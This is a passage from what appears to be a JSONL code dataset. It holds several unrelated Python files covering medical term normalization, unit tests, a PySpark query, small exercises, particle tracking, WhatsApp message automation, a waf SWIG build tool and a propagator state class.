cuiCandidateMatchedTokensCountMap.get(candidateCui)\n if matchedTokensCount >= maxMatchedTokensCount:\n maxMatchedTokensCount = matchedTokensCount\n\n cuiList = matchedTokensCountCuiListMap.get(matchedTokensCount)\n if cuiList is None:\n cuiList = list()\n matchedTokensCountCuiListMap[matchedTokensCount] = cuiList\n cuiList = Util.setList(cuiList, candidateCui)\n\n\n candidateCuiList = matchedTokensCountCuiListMap.get(maxMatchedTokensCount)\n if len(candidateCuiList) == 1:\n return candidateCuiList[0]\n else :\n minCandidateLength = 1000\n for candidateCui in candidateCuiList:\n length = cuiCandidateLengthMap.get(candidateCui)\n if length < minCandidateLength:\n minCandidateLength = length\n cui = candidateCui\n\n\n\n return cui\n\n\ndef makedir_and_clear(dir_path):\n if os.path.exists(dir_path):\n shutil.rmtree(dir_path)\n os.makedirs(dir_path)\n else:\n os.makedirs(dir_path)\n\nfrom alphabet import Alphabet\n\nmulti_sieve_dict_alphabet = Alphabet('dict')\n\ndef init(opt, train_data, d, dictionary, dictionary_reverse, isMeddra_dict):\n logging.info(\"initialize the rule-based normalization model ...\")\n\n Ling.setStopwordsList(os.path.join(d.config['norm_rule_resource'], 'stopwords.txt'))\n Abbreviation.setWikiAbbreviationExpansionMap(os.path.join(d.config['norm_rule_resource'], 'ncbi-wiki-abbreviations.txt'))\n Ling.setDigitToWordformMapAndReverse(os.path.join(d.config['norm_rule_resource'], 'number.txt'))\n Ling.setSuffixMap(os.path.join(d.config['norm_rule_resource'], 'suffix.txt'))\n Ling.setPrefixMap(os.path.join(d.config['norm_rule_resource'], 'prefix.txt'))\n Ling.setAffixMap(os.path.join(d.config['norm_rule_resource'], 'affix.txt'))\n\n\n MultiPassSieveNormalizer.maxSieveLevel = int(d.config['norm_rule_num'])\n\n Evaluation.initialize(d)\n\n Sieve.setStandardTerminology(dictionary, isMeddra_dict)\n\n if d.config.get('norm_rule_use_trainset') != '0':\n if train_data is None:\n if isMeddra_dict:\n Sieve.setTrainingDataTerminology_frompath(opt.train_file, dictionary_reverse, isMeddra_dict)\n else:\n Sieve.setTrainingDataTerminology_frompath(os.path.join(opt.train_file, \"bioc\"), dictionary_reverse, isMeddra_dict)\n else:\n Sieve.setTrainingDataTerminology(train_data, dictionary_reverse, isMeddra_dict)\n\n # external corpus\n if d.config.get('norm_ext_corpus') is not None:\n for k, v in d.config['norm_ext_corpus'].items():\n if k == 'tac':\n Sieve.setTAC2017Terminology(v['path'], dictionary)\n else:\n raise RuntimeError(\"wrong configuration\")\n\n\n if multi_sieve_dict_alphabet.keep_growing:\n norm_utils.init_dict_alphabet(multi_sieve_dict_alphabet, dictionary)\n norm_utils.fix_alphabet(multi_sieve_dict_alphabet)\n\n\ndef runMultiPassSieve(document, entities, dictionary, isMeddra_dict):\n\n concepts = list()\n\n abbreviationObject = Abbreviation()\n abbreviationObject.setTextAbbreviationExpansionMap(document.text)\n\n for entity in entities:\n\n try:\n concept = Concept(str(entity.spans[0][0]) + \"|\" + str(entity.spans[0][1]), entity.name, None, None)\n concept.setNameExpansion(document.text, abbreviationObject)\n concept.setStemmedName()\n concepts.append(concept)\n\n MultiPassSieveNormalizer.applyMultiPassSieve(concept)\n if concept.getCui() == u\"\":\n concept.setCui(u\"CUI-less\")\n except Exception as e:\n logging.info(\"error when process {} in {}\".format(entity.name, document.name))\n concept = Concept(str(entity.spans[0][0]) + \"|\" + str(entity.spans[0][1]), entity.name, None, None)\n concept.setCui(u\"CUI-less\")\n concepts.append(concept)\n continue\n\n\n # fill norm name and id into entity\n for idx, entity in enumerate(entities):\n id = concepts[idx].getCui()\n if id != u\"CUI-less\":\n for _id in id.split(\"|\"):\n if isMeddra_dict:\n name = dictionary[_id]\n entity.norm_ids.append(_id)\n entity.norm_names.append(name)\n else:\n concept = dictionary[_id]\n entity.norm_ids.append(_id)\n entity.norm_names.append(concept.names)\n\n if opt.ensemble == 'sum':\n confidences = np.zeros([len(dictionary)])\n confidences[norm_utils.get_dict_index(multi_sieve_dict_alphabet, _id)] = 1\n entity.norm_confidences.append(confidences)\n if entity.rule_id is None:\n entity.rule_id = _id\n\n\n\ndef finalize(shutdownjvm):\n Ling.clearStopwordsList()\n Abbreviation.clearWikiAbbreviationExpansionMap()\n Ling.clearDigitToWordformMapAndReverse()\n Ling.clearSuffixMap()\n Ling.clearPrefixMap()\n Ling.clearAffixMap()\n\n Sieve.clearStandardTerminology()\n\n Sieve.clearTrainingDataTerminology()\n\n Sieve.clearTAC2017Terminology()\n\n if shutdownjvm:\n shutdownJVM()\n\ndef train(train_data, dev_data, d, dictionary, dictionary_reverse, opt, fold_idx, isMeddra_dict):\n\n init(opt, train_data, d, dictionary, dictionary_reverse, isMeddra_dict)\n\n best_dev_f = -10\n best_dev_p = -10\n best_dev_r = -10\n\n if opt.dev_file:\n p, r, f = norm_utils.evaluate(dev_data, dictionary, dictionary_reverse, None, None, None, d, isMeddra_dict)\n logging.info(\"Dev: p: %.4f, r: %.4f, f: %.4f\" % (p, r, f))\n else:\n f = best_dev_f\n\n if f > best_dev_f:\n logging.info(\"Exceed previous best f score on dev: %.4f\" % (best_dev_f))\n\n best_dev_f = f\n best_dev_p = p\n best_dev_r = r\n\n\n logging.info(\"train finished\")\n\n if fold_idx is None:\n finalize(True)\n else:\n if fold_idx == opt.cross_validation-1:\n finalize(True)\n else:\n finalize(False)\n\n return best_dev_p, best_dev_r, best_dev_f\n\n","sub_path":"multi_sieve.py","file_name":"multi_sieve.py","file_ext":"py","file_size_in_byte":70590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565978244","text":"\"\"\"\n****************************************************************************************************\n:copyright (c) 2019-2020 URBANopt, Alliance for Sustainable Energy, LLC, and other contributors.\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification, are permitted\nprovided that the following conditions are met:\n\nRedistributions of source code must retain the above copyright notice, this list of conditions\nand the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice, this list of conditions\nand the following disclaimer in the documentation and/or other materials provided with the\ndistribution.\n\nNeither the name of the copyright holder nor the names of its contributors may be used to endorse\nor promote products derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR\nIMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n****************************************************************************************************\n\"\"\"\n\nimport os\nimport unittest\n\nfrom geojson_modelica_translator.system_parameters.system_parameters import (\n SystemParameters\n)\n\n\nclass GeoJSONTest(unittest.TestCase):\n def test_load_system_parameters_1(self):\n filename = os.path.abspath(\"tests/system_parameters/data/system_params_1.json\")\n sdp = SystemParameters(filename)\n self.assertEqual(\n sdp.data[\"buildings\"][\"default\"][\"load_model_parameters\"][\"rc\"][\"order\"], 2\n )\n\n def test_load_system_parameters_2(self):\n filename = os.path.abspath(\"tests/system_parameters/data/system_params_2.json\")\n sdp = SystemParameters(filename)\n self.assertIsNotNone(sdp)\n\n def test_missing_file(self):\n fn = \"non-existent-path\"\n with self.assertRaises(Exception) as exc:\n SystemParameters(fn)\n self.assertEqual(\n f\"System design parameters file does not exist: {fn}\", str(exc.exception)\n )\n\n def test_errors(self):\n data = {\n \"buildings\": {\n \"default\": {\n \"load_model\": \"ROM/RC\",\n \"load_model_parameters\": {\"rc\": {\"order\": 6}},\n }\n }\n }\n\n with self.assertRaises(Exception) as exc:\n SystemParameters.loadd(data)\n self.assertRegex(str(exc.exception), \"Invalid system parameter file.*\")\n\n sp = SystemParameters.loadd(data, validate_on_load=False)\n self.assertEqual(sp.validate()[0], \"6 is not one of [1, 2, 3, 4]\")\n\n def test_get_param(self):\n data = {\n \"buildings\": {\n \"default\": {\n \"load_model\": \"ROM/RC\",\n \"load_model_parameters\": {\"rc\": {\"order\": 4}},\n }\n }\n }\n sp = SystemParameters.loadd(data)\n value = sp.get_param(\"buildings.default.load_model_parameters.rc.order\")\n self.assertEqual(value, 4)\n\n value = sp.get_param(\"buildings.default.load_model\")\n self.assertEqual(value, \"ROM/RC\")\n\n value = sp.get_param(\"buildings.default\")\n self.assertDictEqual(\n value,\n {\"load_model\": \"ROM/RC\", \"load_model_parameters\": {\"rc\": {\"order\": 4}}},\n )\n\n value = sp.get_param(\"\")\n self.assertIsNone(value)\n\n value = sp.get_param(\"not.a.real.path\")\n self.assertIsNone(value)\n\n def test_get_param_with_default(self):\n data = {\"buildings\": {\"default\": {\"load_model\": \"Spawn\"}}}\n sp = SystemParameters.loadd(data)\n value = sp.get_param(\n \"buildings.default.load_model_parameters.rc.order\", default=2\n )\n self.assertEqual(value, 2)\n\n value = sp.get_param(\"not.a.real.path\", default=2)\n self.assertEqual(value, 2)\n\n def test_get_param_with_building_id(self):\n filename = os.path.abspath(\"tests/system_parameters/data/system_params_1.json\")\n sdp = SystemParameters(filename)\n\n value = sdp.get_param_by_building_id(\"abcd1234\", \"ets.system\")\n self.assertEqual(value, \"Booster Heater\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/system_parameters/test_system_parameters.py","file_name":"test_system_parameters.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299498532","text":"#!/usr/bin/python2 \n# -*- coding: utf-8 -*-\n\nfrom pyspark import SparkContext \nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import to_date,months_between,current_timestamp,floor\n\n\ndata_enh=\"hdfs://10.190.2.112/data/data_dump.txt\"\ntrain_set=\"hdfs://10.190.2.112/data/train_set.txt\"\nval_set=\"hdfs://10.190.2.112/data/val_set.txt\"\ntest_set=\"hdfs://10.190.2.112/data/test.txt\"\n\n\n#获得数据\nspark = SparkSession.builder.master(\"spark://10.190.2.112:7077\").appName(\"pssql07\").getOrCreate()\ndf = spark.read.csv(data_enh,header=None,encoding=\"utf-8\",inferSchema=True,sep=\"\\t\").drop_duplicates()\n\n\n#执行sql查询1\ndf1=df.select(df[8].alias(\"birth\"),df[11].alias(\"city\"))\ndf1=df1.withColumn('Tdate',to_date(df1[0], 'dd/MM/yyyy')).withColumn('Cur_time',to_date(current_timestamp(),\"dd/MM/yyyy\")) #str-date,now()\ndf2=df1.select(\"city\",floor(months_between('Cur_time','Tdate')/12).alias(\"age\")) #选定月份的差额作为新的列,取别名为age\ndf2.createOrReplaceTempView(\"Tur_db7\")\nq=\"\"\"select city,mean(age) as avg_age\nfrom Tur_db7\ngroup by city\norder by avg_age\n\"\"\"\nspark.sql(q).show(5) #或使用linit 或 rank\n\n\n","sub_path":"N&E local/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179504798","text":"\"\"\"\r\n7. Write a Python script to merge two Python dictionaries.\r\n\"\"\"\r\n\r\n\r\ndef merge_dict(*args):\r\n new_dict = {}\r\n for each in args:\r\n new_dict.update(each)\r\n\r\n return new_dict\r\n\r\n\r\ndict_1 = {\r\n 'name': \"Sulav\",\r\n 'age': 20,\r\n 'section': 'A',\r\n 'semester': 'First'\r\n}\r\ndict_2 = {\r\n 'Nepal': {'capital': 'Kathmandu', 'Population': 300000000},\r\n 'China': {'capital': 'Beijing', 'Population': 1000000000}\r\n}\r\ndict_3 = {\r\n 1: 1,\r\n 2: 4,\r\n 3: 9,\r\n 4: 16,\r\n 5: 25\r\n}\r\nprint(\"Merging dict_1 and dict_2:\")\r\nprint(merge_dict(dict_1, dict_2))\r\n\r\nprint(\"Merging dict_2 and dict_3:\")\r\nprint(merge_dict(dict_2, dict_3))\r\n\r\nprint(\"Merging dict_1 and dict_3:\")\r\nprint(merge_dict(dict_1, dict_3))\r\n\r\nprint(\"Merging dict_1 and dict_2 and dict_3:\")\r\nprint(merge_dict(dict_1, dict_2, dict_3))","sub_path":"Jan 19/Assignment/Dictionary/Jan19_Dictionary_Qsn07.py","file_name":"Jan19_Dictionary_Qsn07.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378246120","text":"def mySqrt(n):\n root = n/2\n #returns the right answer for 3 after five iterations, and for 10 it takes 7 iterations\n for i in range(7):\n newroot = .5 * (root + (n/root))\n root = newroot\n return newroot\n \n \n\nprint(mySqrt(100))\nprint(mySqrt(9))\n\n\n","sub_path":"Unit1/newtonsSquareRoot.py","file_name":"newtonsSquareRoot.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"236150284","text":"# Placeholder for tracking framework\nimport numpy as np\nfrom collections import defaultdict\nfrom scipy.spatial import distance_matrix, KDTree, distance\nimport lap\n\nlbl_t1 = np.random.randint(20, 2028, size=(1000, 2))\nlbl_t2 = np.random.randint(-15, 15, size=(1000,2))+lbl_t1\nlbl_t3 = np.random.randint(-15, 15, size=(1000,2))+lbl_t2\n\nmax_displacement = 20\nmax_discontinuity = 3\n\ntimepoints = [1,2,3]\nconsecutive_tp_pairs = [(timepoints[i], timepoints[i+1])\n for i in range(len(timepoints)-1)]\nlbls = {1: lbl_t1, 2: lbl_t2, 3: lbl_t3}\ntp2idx = {tp:i for i, tp in enumerate(timepoints)}\ntracks = []\nsegment_list = []\ntrack_id = 1\nfor ti, tj in consecutive_tp_pairs:\n lbl_i, lbl_j = lbls[ti], lbls[tj] # Assuming these are centroids\n cost_matrix = distance_matrix(lbl_i, lbl_j)\n total_cost, column2row, row2column = lap.lapjv(cost_matrix,\n cost_limit=max_displacement,\n extend_cost=True)\n for col, row in enumerate(column2row):\n if col == -1:\n tracks.append(([ti], [lbl_i[col]])) # time and xy\n else:\n tracks.append(([ti, tj], [lbl_i[col], lbl_j[row]]))\n track_id += 1\n \n \ntrack_starts = np.array([i[0][0] for i in tracks])\ntrack_ends = np.array([i[0][1] for i in tracks])\n\ntrack_xy_start = np.array([i[1][0] for i in tracks])\ntrack_xy_end = np.array([i[1][1] for i in tracks])\n\nn = len(tracks)\ncc = [] # Finite costs\nii = [] # indices of rows\nkk = []\ngap_cost_mat = np.ones((n, n))*1000\nfor idx, (tps, xys) in enumerate(tracks):\n tstart = tps[0]\n tend = tps[-1]\n xy_start = xys[0]\n xy_end = xys[-1]\n tracks_starting_after_this_ends = np.where((track_starts>=tend) & (track_starts0:\n start_tree = KDTree(track_xy_start[tracks_starting_after_this_ends])\n possmerge_start = start_tree.query(xy_end, k=50, distance_upper_bound=max_displacement)\n for d, tidx in zip(possmerge_start[0], possmerge_start[1]):\n# if idx == tidx:\n# continue\n if d>max_displacement:\n break\n else:\n cc.append(d)\n ii.append(idx)\n kk.append(tidx)\n gap_cost_mat[idx, tracks_starting_after_this_ends[tidx]] = d\n tracks_ending_before_this_track = np.where((track_ends<=tstart) & (track_ends>tstart-max_discontinuity))[0]\n if len(tracks_ending_before_this_track)>0:\n end_tree = KDTree(track_xy_end[tracks_ending_before_this_track])\n possmerge_end = end_tree.query(xy_start, k=50, distance_upper_bound=max_displacement)\n for d, tidx in zip(possmerge_end[0], possmerge_end[1]):\n# if idx == tidx:\n# continue\n if d>max_displacement:\n break\n else:\n cc.append(d)\n ii.append(idx)\n kk.append(tidx)\n gap_cost_mat[idx, tracks_ending_before_this_track[tidx]] = d\n\n \na,b,c = lap.lapjv(gap_cost_mat, cost_limit=max_displacement,\n extend_cost=True)\nfor idx, i in enumerate(c):\n if i == -1:\n continue\n track_i = tracks[idx]\n track_j = tracks[i]\n if track_i[0][0]>track_j[0][0]:\n track_j, track_i = track_i, track_j\n ti_tp = track_i[0]\n ti_xy = track_i[1]\n \n tj_tp = track_j[0]\n tj_xy = track_j[1]\n if ti_tp[-1]==tj_tp[0]:\n# if ti_tp[0]==tj_tp[0]:\n merged_tps = ti_tp[:-1]+tj_tp\n merged_xys = ti_xy[:-1]+tj_xy\n elif ti_tp[-1]tj_tp[0]:\n merged_tps = tj_tp+ti_tp\n merged_xys = tj_xy+ti_xy\n merged_xys = list(map(tuple, merged_xys))\n if len(merged_xys)>3:\n print(track_i, track_j, idx, i)\n #print(merged_xys)\n \n \na,b,c = lap.lapjv(gap_cost_mat, cost_limit=max_displacement,\n extend_cost=True)\ntrack_dict = {}\nfor idx, i in enumerate(c):\n if i == -1:\n continue\n track_i = tracks[idx]\n track_j = tracks[i]\n if track_i[0][0]>track_j[0][0]:\n track_j, track_i = track_i, track_j\n ti_tp = track_i[0]\n ti_xy = track_i[1]\n \n tj_tp = track_j[0]\n tj_xy = track_j[1]\n if ti_tp[-1]==tj_tp[0]:\n# if ti_tp[0]==tj_tp[0]:\n merged_tps = ti_tp[:-1]+tj_tp\n merged_xys = ti_xy[:-1]+tj_xy\n elif ti_tp[-1]tj_tp[0]:\n merged_tps = tj_tp+ti_tp\n merged_xys = tj_xy+ti_xy\n merged_xys = tuple(map(tuple, merged_xys))\n if len(merged_xys)>3:\n print(track_i, track_j, idx, i)\n track_dict[merged_xys] = merged_tps\n #print(merged_xys)","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504696816","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\n# import pandas\nimport time\n\ndef send_to_saved(lst,message):\n # Load the chrome driver\n driver = webdriver.Chrome()\n count = 0\n driver.get(\"https://web.whatsapp.com/\")\n wait = WebDriverWait(driver, 80)\n for number in lst:\n search_box = '//*[@id=\"side\"]/div[1]/div/label/div/div[2]'\n person_title = wait.until(lambda driver:driver.find_element_by_xpath(search_box))\n\n # Clear search box if any contact number is written in it\n person_title.clear()\n\n # Send contact number in search box\n person_title.send_keys(number)\n count = count + 1\n\n # Wait for 2 seconds to search contact number\n time.sleep(2)\n\n try:\n # Load error message in case unavailability of contact number\n element = driver.find_element_by_xpath('//*[@id=\"pane-side\"]/div[1]/div/span')\n except NoSuchElementException:\n # Format the message from excel sheet\n \n person_title.send_keys(Keys.ENTER)\n actions = ActionChains(driver)\n actions.send_keys(message)\n actions.send_keys(Keys.ENTER)\n actions.perform()\n # Close chrome browser\n driver.quit()\n","sub_path":"send/saved_contacts.py","file_name":"saved_contacts.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255176270","text":"#! /usr/bin/env python\n# Petar Forai\n# Thomas Nagy 2008-2010 (ita)\nimport re\n\nfrom waflib import Logs\nfrom waflib import Task\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import after_method\nfrom waflib.TaskGen import extension\nfrom waflib.TaskGen import feature\nfrom waflib.Tools import c_preproc\n\n\"\"\"\ntasks have to be added dynamically:\n- swig interface files may be created at runtime\n- the module name may be unknown in advance\n\"\"\"\n\nSWIG_EXTS = [\".swig\", \".i\"]\n\nre_module = re.compile(r\"%module(?:\\s*\\(.*\\))?\\s+(.+)\", re.M)\n\nre_1 = re.compile(r\"^%module.*?\\s+([\\w]+)\\s*?$\", re.M)\nre_2 = re.compile('[#%]include [<\"](.*)[\">]', re.M)\n\n\nclass swig(Task.Task):\n color = \"BLUE\"\n run_str = (\n \"${SWIG} ${SWIGFLAGS} ${SWIGPATH_ST:INCPATHS} ${SWIGDEF_ST:DEFINES} ${SRC}\"\n )\n ext_out = [\".h\"] # might produce .h files although it is not mandatory\n vars = [\"SWIG_VERSION\", \"SWIGDEPS\"]\n\n def runnable_status(self):\n for t in self.run_after:\n if not t.hasrun:\n return Task.ASK_LATER\n\n if not getattr(self, \"init_outputs\", None):\n self.init_outputs = True\n if not getattr(self, \"module\", None):\n # search the module name\n txt = self.inputs[0].read()\n m = re_module.search(txt)\n if not m:\n raise ValueError(\"could not find the swig module name\")\n self.module = m.group(1)\n\n swig_c(self)\n\n # add the language-specific output files as nodes\n # call funs in the dict swig_langs\n for x in self.env[\"SWIGFLAGS\"]:\n # obtain the language\n x = x[1:]\n try:\n fun = swig_langs[x]\n except KeyError:\n pass\n else:\n fun(self)\n\n return super().runnable_status()\n\n def scan(self):\n \"scan for swig dependencies, climb the .i files\"\n lst_src = []\n\n seen = []\n missing = []\n to_see = [self.inputs[0]]\n\n while to_see:\n node = to_see.pop(0)\n if node in seen:\n continue\n seen.append(node)\n lst_src.append(node)\n\n # read the file\n code = node.read()\n code = c_preproc.re_nl.sub(\"\", code)\n code = c_preproc.re_cpp.sub(c_preproc.repl, code)\n\n # find .i files and project headers\n names = re_2.findall(code)\n for n in names:\n for d in self.generator.includes_nodes + [node.parent]:\n u = d.find_resource(n)\n if u:\n to_see.append(u)\n break\n else:\n missing.append(n)\n return (lst_src, missing)\n\n\n# provide additional language processing\nswig_langs = {}\n\n\ndef swigf(fun):\n swig_langs[fun.__name__.replace(\"swig_\", \"\")] = fun\n return fun\n\n\nswig.swigf = swigf\n\n\ndef swig_c(self):\n ext = \".swigwrap_%d.c\" % self.generator.idx\n flags = self.env[\"SWIGFLAGS\"]\n if \"-c++\" in flags:\n ext += \"xx\"\n out_node = self.inputs[0].parent.find_or_declare(self.module + ext)\n\n if \"-c++\" in flags:\n c_tsk = self.generator.cxx_hook(out_node)\n else:\n c_tsk = self.generator.c_hook(out_node)\n\n c_tsk.set_run_after(self)\n\n # transfer weights from swig task to c task\n if getattr(self, \"weight\", None):\n c_tsk.weight = self.weight\n if getattr(self, \"tree_weight\", None):\n c_tsk.tree_weight = self.tree_weight\n\n try:\n self.more_tasks.append(c_tsk)\n except AttributeError:\n self.more_tasks = [c_tsk]\n\n try:\n ltask = self.generator.link_task\n except AttributeError:\n pass\n else:\n ltask.set_run_after(c_tsk)\n # setting input nodes does not declare the build order\n # because the build already started, but it sets\n # the dependency to enable rebuilds\n ltask.inputs.append(c_tsk.outputs[0])\n\n self.outputs.append(out_node)\n\n if not \"-o\" in self.env[\"SWIGFLAGS\"]:\n self.env.append_value(\"SWIGFLAGS\", [\"-o\", self.outputs[0].abspath()])\n\n\n@swigf\ndef swig_python(tsk):\n node = tsk.inputs[0].parent\n if tsk.outdir:\n node = tsk.outdir\n tsk.set_outputs(node.find_or_declare(tsk.module + \".py\"))\n\n\n@swigf\ndef swig_ocaml(tsk):\n node = tsk.inputs[0].parent\n if tsk.outdir:\n node = tsk.outdir\n tsk.set_outputs(node.find_or_declare(tsk.module + \".ml\"))\n tsk.set_outputs(node.find_or_declare(tsk.module + \".mli\"))\n\n\n@extension(*SWIG_EXTS)\ndef i_file(self, node):\n # the task instance\n tsk = self.create_task(\"swig\")\n tsk.set_inputs(node)\n tsk.module = getattr(self, \"swig_module\", None)\n\n flags = self.to_list(getattr(self, \"swig_flags\", []))\n tsk.env.append_value(\"SWIGFLAGS\", flags)\n\n tsk.outdir = None\n if \"-outdir\" in flags:\n outdir = flags[flags.index(\"-outdir\") + 1]\n outdir = tsk.generator.bld.bldnode.make_node(outdir)\n outdir.mkdir()\n tsk.outdir = outdir\n\n\n@feature(\"c\", \"cxx\", \"d\", \"fc\", \"asm\")\n@after_method(\"apply_link\", \"process_source\")\ndef enforce_swig_before_link(self):\n try:\n link_task = self.link_task\n except AttributeError:\n pass\n else:\n for x in self.tasks:\n if x.__class__.__name__ == \"swig\":\n link_task.run_after.add(x)\n\n\n@conf\ndef check_swig_version(conf, minver=None):\n \"\"\"\n Check if the swig tool is found matching a given minimum version.\n minver should be a tuple, eg. to check for swig >= 1.3.28 pass (1,3,28) as minver.\n\n If successful, SWIG_VERSION is defined as 'MAJOR.MINOR'\n (eg. '1.3') of the actual swig version found.\n\n :param minver: minimum version\n :type minver: tuple of int\n :return: swig version\n :rtype: tuple of int\n \"\"\"\n assert minver is None or isinstance(minver, tuple)\n swigbin = conf.env[\"SWIG\"]\n if not swigbin:\n conf.fatal(\"could not find the swig executable\")\n\n # Get swig version string\n cmd = swigbin + [\"-version\"]\n Logs.debug(\"swig: Running swig command %r\", cmd)\n reg_swig = re.compile(r\"SWIG Version\\s(.*)\", re.M)\n swig_out = conf.cmd_and_log(cmd)\n swigver_tuple = tuple([int(s) for s in reg_swig.findall(swig_out)[0].split(\".\")])\n\n # Compare swig version with the minimum required\n result = (minver is None) or (swigver_tuple >= minver)\n\n if result:\n # Define useful environment variables\n swigver = \".\".join([str(x) for x in swigver_tuple[:2]])\n conf.env[\"SWIG_VERSION\"] = swigver\n\n # Feedback\n swigver_full = \".\".join(map(str, swigver_tuple[:3]))\n if minver is None:\n conf.msg(\"Checking for swig version\", swigver_full)\n else:\n minver_str = \".\".join(map(str, minver))\n conf.msg(\n f\"Checking for swig version >= {minver_str}\",\n swigver_full,\n color=result and \"GREEN\" or \"YELLOW\",\n )\n\n if not result:\n conf.fatal(f\"The swig version is too old, expecting {minver!r}\")\n\n return swigver_tuple\n\n\ndef configure(conf):\n conf.find_program(\"swig\", var=\"SWIG\")\n conf.env.SWIGPATH_ST = \"-I%s\"\n conf.env.SWIGDEF_ST = \"-D%s\"\n","sub_path":"docs/.mywaflib/waflib/extras/swig.py","file_name":"swig.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18898522","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport os\nfrom Utilities import FileUtilities\nfrom matplotlib import pyplot as plt\nfrom EarthMovingDistance import EarthMovingDistance\n\ndef main():\n\t'''\n\t\tRetuns after calculating the closest activity\n\t'''\n\tpath = '/Users/Apple/Documents/gitRepo/ra-eeyes-activity-detection/data_input/'\n\tutl = FileUtilities(path)\n\tamplitude_matrices = utl.get_amplitude_matrices()\n\tprint(\"Number of matrices read = \", len(amplitude_matrices))\n\n\thistograms = []\n\tfor amplitude_matrix in amplitude_matrices:\n\t\tfor i in amplitude_matrix:\n\t\t\tfreq = np.zeros(40)\n\t\t\tfor j in i:\n\t\t\t\tfreq[int(j)] += 1\n\t\thistograms.append(freq)\n\n\tlabels_np = np.array(utl.labels)\n\tprint(utl.labels)\n\temd = EarthMovingDistance(histograms)\n\temd_matrix = emd.get_EMD_matrix()\n\tclosest_activity = emd.get_closest_activity()\n\tpredicted = labels_np[closest_activity]\n\tprint(\"______________________ EMD matrix start ______________________\")\n\tprint(emd_matrix)\n\tprint(\"______________________ EMD matrix ends _______________________\")\n\tprint(\"___________________ closest_activity start ___________________\")\n\tprint(predicted)\n\tprint(\"___________________ closest_activity ends ____________________\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"InPlace.py","file_name":"InPlace.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"626416099","text":"\"\"\"\nThis module provides a State class responsible for thread-specific propagation.\n\"\"\"\n\nfrom abc import abstractmethod\nfrom collections import OrderedDict\nfrom itertools import chain\nfrom .util import lerp, remove_if, TodoList, SortedDict, measure_time_decorator, ABC\nfrom .base import TRUE_LIT, ThreadStatistics\n\n\nclass AbstractConstraint(ABC):\n \"\"\"\n Base class of all constraints.\n \"\"\"\n\n @abstractmethod\n def create_state(self):\n \"\"\"\n Create thread specific state for the constraint.\n \"\"\"\n\n\nclass AbstractConstraintState(ABC):\n \"\"\"\n Abstract class to capture the state of constraints.\n \"\"\"\n def __init__(self):\n self.inactive_level = 0\n\n @abstractmethod\n def attach(self, state):\n \"\"\"\n Attach the constraint to the state.\n \"\"\"\n\n @abstractmethod\n def detach(self, state):\n \"\"\"\n Detach the constraint from the state.\n \"\"\"\n\n @abstractmethod\n def translate(self, cc, state, config, added):\n \"\"\"\n Translate a constraint to simpler constraints.\n \"\"\"\n\n @abstractmethod\n def update(self, i, diff):\n \"\"\"\n Inform the state about updated bounds of a variable.\n\n Value i depends on the value passed when registering the watch and diff\n is the change to the bound of the watched variable.\n \"\"\"\n\n @abstractmethod\n def undo(self, i, diff):\n \"\"\"\n Similar to update but when the bound of a variable is backtracked.\n \"\"\"\n\n @abstractmethod\n def propagate(self, state, cc, config, check_state):\n \"\"\"\n Prepagates the constraint.\n \"\"\"\n\n @abstractmethod\n def check_full(self, state):\n \"\"\"\n Check if the state meets the state invariants.\n \"\"\"\n\n @property\n def marked_inactive(self):\n \"\"\"\n Returns true if the constraint is marked inactive.\n \"\"\"\n return self.inactive_level > 0\n\n @marked_inactive.setter\n def marked_inactive(self, level):\n \"\"\"\n Mark a constraint as inactive on the given level.\n \"\"\"\n assert not self.marked_inactive\n self.inactive_level = level+1\n\n def mark_active(self):\n \"\"\"\n Mark a constraint as active.\n \"\"\"\n self.inactive_level = 0\n\n def removable(self, level):\n \"\"\"\n A 